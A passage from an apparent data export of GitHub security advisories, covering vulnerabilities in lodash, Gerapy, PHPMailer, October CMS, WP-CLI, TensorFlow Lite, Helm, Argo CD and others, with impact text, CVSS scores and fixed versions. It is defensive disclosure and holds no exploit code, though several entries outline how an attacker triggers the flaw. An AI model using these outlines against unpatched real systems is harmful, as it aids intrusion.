'https://lists.apache.org/thread.html/re1e35881482e07dc2be6058d9b44483457f36133cac67956686ad9b9@%3Cnotifications.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf35026148ccc0e1af133501c0d003d052883fcc65107b3ff5d3b61cd%40%3Cusers.pdfbox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf35026148ccc0e1af133501c0d003d052883fcc65107b3ff5d3b61cd@%3Cusers.pdfbox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2AVLKAHFMPH72TTP25INPZPGX5FODK3H/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6KDA2U4KL2N3XT3PM4ZJEBBA6JJIH2G4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6PT72QOFDXLJ7PLTN66EMG5EHPTE7TFZ/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/03/19/10'}]","{'cwe_ids': ['CWE-789'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T18:36:26Z', 'nvd_published_at': '2021-03-19T16:15:00Z'}" +1.4.0,GHSA-2frx-j9hj-6c65,2021-10-08T21:21:39Z,2021-05-17T20:52:21Z,,[],User enumeration in authentication mechanisms,"Description +----------- + +The ability to enumerate users was possible without relevant permissions due to different exception messages depending on whether the user existed or not. + +Resolution +---------- + +We now ensure that a generic message is returned whether the user exists or not if the password is invalid or if the user does not exist. + +The patch for this issue is available [here](https://github.com/lexik/LexikJWTAuthenticationBundle/commit/a175d6dab968d93e96a3e4f80c495435f71d5eb7) for branch 2.10.x and 2.x. + +Credits +------- + +I would like to thank James Isaac and Mathias Brodala for reporting the issue and Robin Chalas for fixing the issue.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'lexik/jwt-authentication-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.10.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'lexik/jwt-authentication-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.11.0'}, {'fixed': '2.11.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/lexik/LexikJWTAuthenticationBundle/security/advisories/GHSA-2frx-j9hj-6c65'}, {'type': 'WEB', 'url': 'https://github.com/lexik/LexikJWTAuthenticationBundle/commit/a175d6dab968d93e96a3e4f80c495435f71d5eb7'}, {'type': 'PACKAGE', 'url': 'https://github.com/lexik/LexikJWTAuthenticationBundle/'}]","{'cwe_ids': ['CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T19:20:17Z', 'nvd_published_at': None}" +1.4.0,GHSA-fcr8-6q7r-m4wg,2022-10-20T13:56:32Z,2021-05-04T17:42:33Z,,['CVE-2021-21264'],"Bypass of fix for CVE-2020-26231, Twig sandbox escape","### Impact +A bypass of CVE-2020-26231 (fixed in 1.0.470/471 and 1.1.1) was discovered that has the same impact as CVE-2020-26231 & CVE-2020-15247: + +An authenticated backend user with the `cms.manage_pages`, `cms.manage_layouts`, or `cms.manage_partials` permissions who would **normally** not be permitted to provide PHP code to be executed by the CMS due to `cms.enableSafeMode` being enabled is able to write specific Twig code to escape the Twig sandbox and execute arbitrary PHP. + +This is not a problem for anyone that trusts their users with those permissions to normally write & manage PHP within the CMS by not having `cms.enableSafeMode` enabled, but would be a problem for anyone relying on `cms.enableSafeMode` to ensure that users with those permissions in production do not have access to write & execute arbitrary PHP. + +### Patches +Issue has been patched in Build 472 (v1.0.472) and v1.1.2. + +### Workarounds +Apply https://github.com/octobercms/october/commit/f63519ff1e8d375df30deba63156a2fc97aa9ee7 to your installation manually if unable to upgrade to Build 472 or v1.1.2. + +### References +Reported by [ka1n4t](https://github.com/ka1n4t) + +### For more information +If you have any questions or comments about this advisory: +* Email us at [hello@octobercms.com](mailto:hello@octobercms.com) + +### Threat assessment: +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'october/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.471'}, {'fixed': '1.0.472'}]}], 'versions': ['1.0.471']}, {'package': {'ecosystem': 'Packagist', 'name': 'october/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.1'}, {'fixed': '1.1.2'}]}], 'versions': ['1.1.1']}]","[{'type': 'WEB', 'url': 'https://github.com/octobercms/october/security/advisories/GHSA-fcr8-6q7r-m4wg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21264'}, {'type': 'PACKAGE', 'url': 'https://github.com/octobercms/october'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-03T15:59:55Z', 'nvd_published_at': '2021-05-03T16:15:00Z'}" +1.4.0,GHSA-952m-m83c-3xm6,2021-05-21T23:05:25Z,2021-05-24T16:58:37Z,,['CVE-2020-12699'],Open redirect in direct_mail,The direct_mail extension through 5.2.3 for TYPO3 has an Open Redirect via jumpUrl.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'directmailteam/direct-mail'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12699'}, {'type': 'WEB', 'url': 'https://typo3.org/help/security-advisories'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2020-005'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T23:05:25Z', 'nvd_published_at': '2020-05-13T13:15:00Z'}" +1.4.0,GHSA-fv82-r8qv-ch4v,2021-05-20T20:47:18Z,2021-05-21T16:24:22Z,,['CVE-2021-29652'],pomerium_signature is not verified in middleware in github.com/pomerium/pomerium,"### Impact +Some API endpoints under /.pomerium/ do not verify parameters with pomerium_signature. This could allow modifying parameters intended to be trusted to Pomerium. + +The issue mainly affects routes responsible for sign in/out, but does not introduce an authentication bypass. + +### Patches +Patched in v0.13.4 + +### For more information +If you have any questions or comments about this advisory +* Open an issue in [pomerium](http://github.com/pomerium/pomerium) +* Email us at [security@pomerium.com](mailto:security@pomerium.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/pomerium/pomerium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.10.0'}, {'fixed': '0.13.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/pomerium/pomerium/authenticate'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.10.0'}, {'fixed': '0.13.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pomerium/pomerium/security/advisories/GHSA-fv82-r8qv-ch4v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29652'}, {'type': 'WEB', 'url': 'https://github.com/pomerium/pomerium/pull/2048'}]","{'cwe_ids': ['CWE-601'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T20:47:18Z', 'nvd_published_at': None}" +1.4.0,GHSA-7q4h-pj78-j7vg,2021-10-21T17:14:23Z,2021-05-13T22:31:05Z,,['CVE-2021-22696'],Authorization service vulnerable to DDos attacks in Apache CFX,"CXF supports (via JwtRequestCodeFilter) passing OAuth 2 parameters via a JWT token as opposed to query parameters (see: The OAuth 2.0 Authorization Framework: JWT Secured Authorization Request (JAR)). Instead of sending a JWT token as a ""request"" parameter, the spec also supports specifying a URI from which to retrieve a JWT token from via the ""request_uri"" parameter. CXF was not validating the ""request_uri"" parameter (apart from ensuring it uses ""https) and was making a REST request to the parameter in the request to retrieve a token. This means that CXF was vulnerable to DDos attacks on the authorization server, as specified in section 10.4.1 of the spec. This issue affects Apache CXF versions prior to 3.4.3; Apache CXF versions prior to 3.3.10.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.cxf:cxf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.4.0'}, {'fixed': '3.4.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.cxf:cxf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.cxf:apache-cxf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.4.0'}, {'fixed': '3.4.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.cxf:apache-cxf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22696'}, {'type': 'WEB', 'url': 'https://github.com/apache/cxf/commit/40503a53914758759894f704bbf139ae89ace286'}, {'type': 'WEB', 'url': 'https://github.com/apache/cxf/commit/aa789c5c4686597a7bdef2443909ab491fc2bc04'}, {'type': 'WEB', 'url': 'https://cxf.apache.org/security-advisories.data/CVE-2021-22696.txt.asc'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/cxf'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6445001cc5f9a2bb1e6316993753306e054bdd1d702656b7cbe59045@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8651c06212c56294a1c0ea61a5ad7790c06502209c03f05c0c7c9914@%3Cdev.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8651c06212c56294a1c0ea61a5ad7790c06502209c03f05c0c7c9914@%3Cusers.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rec7160382badd3ef4ad017a22f64a266c7188b9ba71394f0d321e2d4@%3Ccommits.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfb87e0bf3995e7d560afeed750fac9329ff5f1ad49da365129b7f89e@%3Ccommits.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/04/02/2'}]","{'cwe_ids': ['CWE-400', 'CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T18:02:48Z', 'nvd_published_at': '2021-04-02T10:15:00Z'}" +1.4.0,GHSA-m298-fh5c-jc66,2021-05-10T19:27:44Z,2021-05-04T17:42:13Z,,['CVE-2020-36326'],Object injection in PHPMailer/PHPMailer,"### Impact +This is a reintroduction of an earlier issue (CVE-2018-19296) by an unrelated bug fix in PHPMailer 6.1.8. An external file may be unexpectedly executable if it is used as a path to an attachment file via PHP's support for `.phar` files`. Exploitation requires that an attacker is able to provide an unfiltered path to a file to attach, or to trick calling code into generating one. See [this article](https://knasmueller.net/5-answers-about-php-phar-exploitation) for more info. + +### Patches +This issue was patched in the PHPMailer 6.4.1 release. This release also implements stricter filtering for attachment paths; paths that look like *any* kind of URL are rejected. + +### Workarounds +Validate paths to loaded files using the same pattern as used in [`isPermittedPath()`](https://github.com/PHPMailer/PHPMailer/blob/master/src/PHPMailer.php#L1815) before using them in *any* PHP file function, such as `file_exists`. This method can't be used directly because it is protected, but you can implement the same thing in calling code. Note that this should be applied to *all* user-supplied paths passed into such functions; it's not a problem specific to PHPMailer. + +### Credit +This issue was found by Fariskhi Vidyan, reported and managed via Tidelift.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'phpmailer/phpmailer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.1.8'}, {'fixed': '6.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/security/advisories/GHSA-m298-fh5c-jc66'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36326'}, {'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/commit/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3B5WDPGUFNPG4NAZ6G4BZX43BKLAVA5B/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KPU66INRFY5BQ3ESVPRUXJR4DXQAFJVT/'}]","{'cwe_ids': ['CWE-502', 'CWE-641'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-30T19:41:24Z', 'nvd_published_at': '2021-04-28T03:15:00Z'}" +1.4.0,GHSA-c52f-pq47-2r9j,2021-11-19T15:21:02Z,2021-05-24T16:57:21Z,,['CVE-2020-15187'],plugin.yaml file allows for duplicate entries in helm,"### Impact + +During a security audit of Helm's code base, Helm maintainers identified a bug in which a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. + +To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded (which can occur during a MITM attack on a non-SSL connection). + +### Patches + +This issue has been patched in Helm 2.16.11 and Helm 3.3.2. + +### Workarounds + +Make sure to install plugins using a secure connection protocol like SSL.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm/v3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.3.2'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.16.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm/v3/pkg/plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.16.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm/v3/pkg/plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.3.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/helm/helm/security/advisories/GHSA-c52f-pq47-2r9j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15187'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/commit/6aab63765f99050b115f0aec3d6350c85e8da946'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/commit/d9ef5ce8bad512e325390c0011be1244b8380e4b'}, {'type': 'PACKAGE', 'url': 'https://github.com/helm/helm'}]","{'cwe_ids': ['CWE-694', 'CWE-74'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T12:56:32Z', 'nvd_published_at': '2020-09-17T22:15:00Z'}" +1.4.0,GHSA-35jh-r3h4-6jhm,2022-02-08T21:35:09Z,2021-05-06T16:05:51Z,,['CVE-2021-23337'],Command Injection in lodash,`lodash` versions prior to 4.17.21 are vulnerable to Command Injection via the template function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'lodash'}, 'ecosystem_specific': {'affected_functions': ['lodash.template']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.17.21'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'lodash-es'}, 'ecosystem_specific': {'affected_functions': ['lodash.template']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.17.21'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23337'}, {'type': 'WEB', 'url': 'https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/lodash/lodash'}, {'type': 'WEB', 'url': 'https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js#L14851'}, {'type': 'WEB', 'url': 'https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js%23L14851'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210312-0006/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074932'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074930'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074928'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074931'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074929'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-LODASH-1040724'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-77', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T23:59:26Z', 'nvd_published_at': '2021-02-15T13:15:00Z'}" +1.4.0,GHSA-rf3h-xgv5-2q39,2021-05-17T22:29:55Z,2021-05-21T14:28:12Z,,['CVE-2021-29602'],Division by zero in TFLite's implementation of `DepthwiseConv`,"### Impact +The implementation of the `DepthwiseConv` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/1a8e885b864c818198a5b2c0cbbeca5a1e833bc8/tensorflow/lite/kernels/depthwise_conv.cc#L287-L288): + +```cc +int num_input_channels = SizeOfDimension(input, 3); +TF_LITE_ENSURE_EQ(context, num_filter_channels % num_input_channels, 0); +``` + +An attacker can craft a model such that `input`'s fourth dimension would be 0. + +### Patches +We have patched the issue in GitHub commit [cbda3c6b2dbbd3fbdc482ff8c0170a78ec2e97d0](https://github.com/tensorflow/tensorflow/commit/cbda3c6b2dbbd3fbdc482ff8c0170a78ec2e97d0). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-rf3h-xgv5-2q39'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29602'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/cbda3c6b2dbbd3fbdc482ff8c0170a78ec2e97d0'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T22:29:55Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-g57j-q48p-9vm2,2023-09-01T09:24:18Z,2021-05-06T18:52:13Z,,['CVE-2020-7698'],Command injection in Gerapy,"This affects the package Gerapy from 0 and before 0.9.3. The input being passed to Popen, via the project_configure endpoint, isn’t being sanitized.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'gerapy'}, 'ecosystem_specific': {'affected_functions': ['gerapy.server.core.views.project_configure', 'gerapy.server.core.views.job_list', 'gerapy.server.core.views.job_log', 'gerapy.server.core.views.job_cancel', 'gerapy.server.core.views.del_version', 'gerapy.server.core.views.del_project', 'gerapy.server.core.views.task_remove', 'gerapy.server.core.views.render_html']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7698'}, {'type': 'WEB', 'url': 'https://github.com/Gerapy/Gerapy/commit/e8446605eb2424717418eae199ec7aad573da2d2'}, {'type': 'PACKAGE', 'url': 'https://github.com/Gerapy/Gerapy'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-GERAPY-572470'}]","{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-06T17:32:40Z', 'nvd_published_at': '2020-07-29T13:15:00Z'}" +1.4.0,GHSA-rwgm-f83r-v3qj,2021-06-18T20:29:34Z,2021-05-19T23:03:11Z,,['CVE-2021-29504'],Improper Certificate Validation in WP-CLI framework,"### Impact +An improper error handling in HTTPS requests management in WP-CLI version 0.12.0 and later allows remote attackers able to intercept the communication to remotely disable the certificate verification on WP-CLI side, gaining full control over the communication content, including the ability to impersonate update servers and push malicious updates towards WordPress instances controlled by the vulnerable WP-CLI agent, or push malicious updates toward WP-CLI itself. + +### Patches +The vulnerability stems from the fact that the default behavior of `WP_CLI\Utils\http_request()` when encountering a TLS handshake error is to disable certificate validation and retry the same request. + +The default behavior has been changed with version 2.5.0 of WP-CLI and the `wp-cli/wp-cli` framework (via https://github.com/wp-cli/wp-cli/pull/5523) so that the `WP_CLI\Utils\http_request()` method accepts an `$insecure` option that is `false` by default and consequently that a TLS handshake failure is a hard error by default. This new default is a breaking change and ripples through to all consumers of `WP_CLI\Utils\http_request()`, including those in separate WP-CLI bundled or third-party packages. + +https://github.com/wp-cli/wp-cli/pull/5523 has also added an `--insecure` flag to the `cli update` command to counter this breaking change. + +Subsequent PRs on the command repositories have added an `--insecure` flag to the appropriate commands on the following repositories to counter the breaking change: + +* https://github.com/wp-cli/config-command/pull/128 +* https://github.com/wp-cli/core-command/pull/186 +* https://github.com/wp-cli/extension-command/pull/287 +* https://github.com/wp-cli/checksum-command/pull/86 +* https://github.com/wp-cli/package-command/pull/138 + +### Workarounds +There is no direct workaround for the default insecure behavior of `wp-cli/wp-cli` versions before 2.5.0. + +The workaround for dealing with the breaking change in the commands directly affected by the new secure default behavior is to add the `--insecure` flag to manually opt-in to the previous insecure behavior. + +### References +* [CWE: Improper Certificate Validation](https://cwe.mitre.org/data/definitions/295.html) + +### For more information +If you have any questions or comments about this advisory: +* Join the `#cli` channel in the [WordPress.org Slack](https://make.wordpress.org/chat/) to ask questions or provide feedback. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'wp-cli/wp-cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/wp-cli/wp-cli/security/advisories/GHSA-rwgm-f83r-v3qj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29504'}, {'type': 'WEB', 'url': 'https://github.com/wp-cli/checksum-command/pull/86'}, {'type': 'WEB', 'url': 'https://github.com/wp-cli/config-command/pull/128'}, {'type': 'WEB', 'url': 'https://github.com/wp-cli/core-command/pull/186'}, {'type': 'WEB', 'url': 'https://github.com/wp-cli/extension-command/pull/287'}, {'type': 'WEB', 'url': 'https://github.com/wp-cli/package-command/pull/138'}, {'type': 'WEB', 'url': 'https://github.com/wp-cli/wp-cli/pull/5523'}]","{'cwe_ids': ['CWE-295'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T19:51:53Z', 'nvd_published_at': '2021-06-07T21:15:00Z'}" +1.4.0,GHSA-q6cj-6jvq-jwmh,2021-05-04T21:59:38Z,2021-05-18T18:27:28Z,,['CVE-2019-19023'],Privilege Escalation in Cloud Native Computing Foundation Harbor,Cloud Native Computing Foundation Harbor prior to 1.8.6 and 1.9.3 has a Privilege Escalation Vulnerability in the VMware Harbor Container Registry for the Pivotal Platform.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/goharbor/harbor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'fixed': '1.8.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/goharbor/harbor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.0'}, {'fixed': '1.9.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/goharbor/harbor/security/advisories/GHSA-3868-7c5x-4827'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-19023'}, {'type': 'WEB', 'url': 'https://github.com/goharbor/harbor/security/advisories'}, {'type': 'WEB', 'url': 'https://tanzu.vmware.com/security/cve-2019-19023'}]","{'cwe_ids': ['CWE-269'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T21:59:38Z', 'nvd_published_at': '2020-03-20T03:15:00Z'}" +1.4.0,GHSA-6w87-g839-9wv7,2021-10-05T16:35:57Z,2021-05-21T14:31:28Z,,[],Helm OCI credentials leaked into Argo CD logs,"### Impact + +When Argo CD was connected to a Helm OCI repository with authentication enabled, the credentials used for accessing the remote repository were logged. + +Anyone with access to the pod logs - either via access with appropriate permissions to the Kubernetes control plane or a third party log management system where the logs from Argo CD were aggregated - could have potentially obtained the credentials to the Helm OCI repository. + +If you are using Helm OCI repositories with Argo CD, it is strongly recommended to upgrade Argo CD to the latest patch version and to change the credentials used to access the repositories. + +### Patches + +A patch for this vulnerability is available with the v1.8.7 and v1.7.14 releases of Argo CD. + +### Workarounds + +No workaround available + +### References + +N/A + +### For more information + +If you have any questions or comments about this advisory: + +* Open an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions) +* Join us on [Slack](https://argoproj.github.io/community/join-slack) in channel `#argo-cd` + +### Credits + +This vulnerability was found and reported by a third-party who wishes to stay anonymous. We want to thank this third-party for disclosing this vulnerability to us in a responsible manner.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.14'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.8.0'}, {'fixed': '1.8.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/security/advisories/GHSA-6w87-g839-9wv7'}, {'type': 'PACKAGE', 'url': 'https://github.com/argoproj/argo-cd'}]","{'cwe_ids': ['CWE-532'], 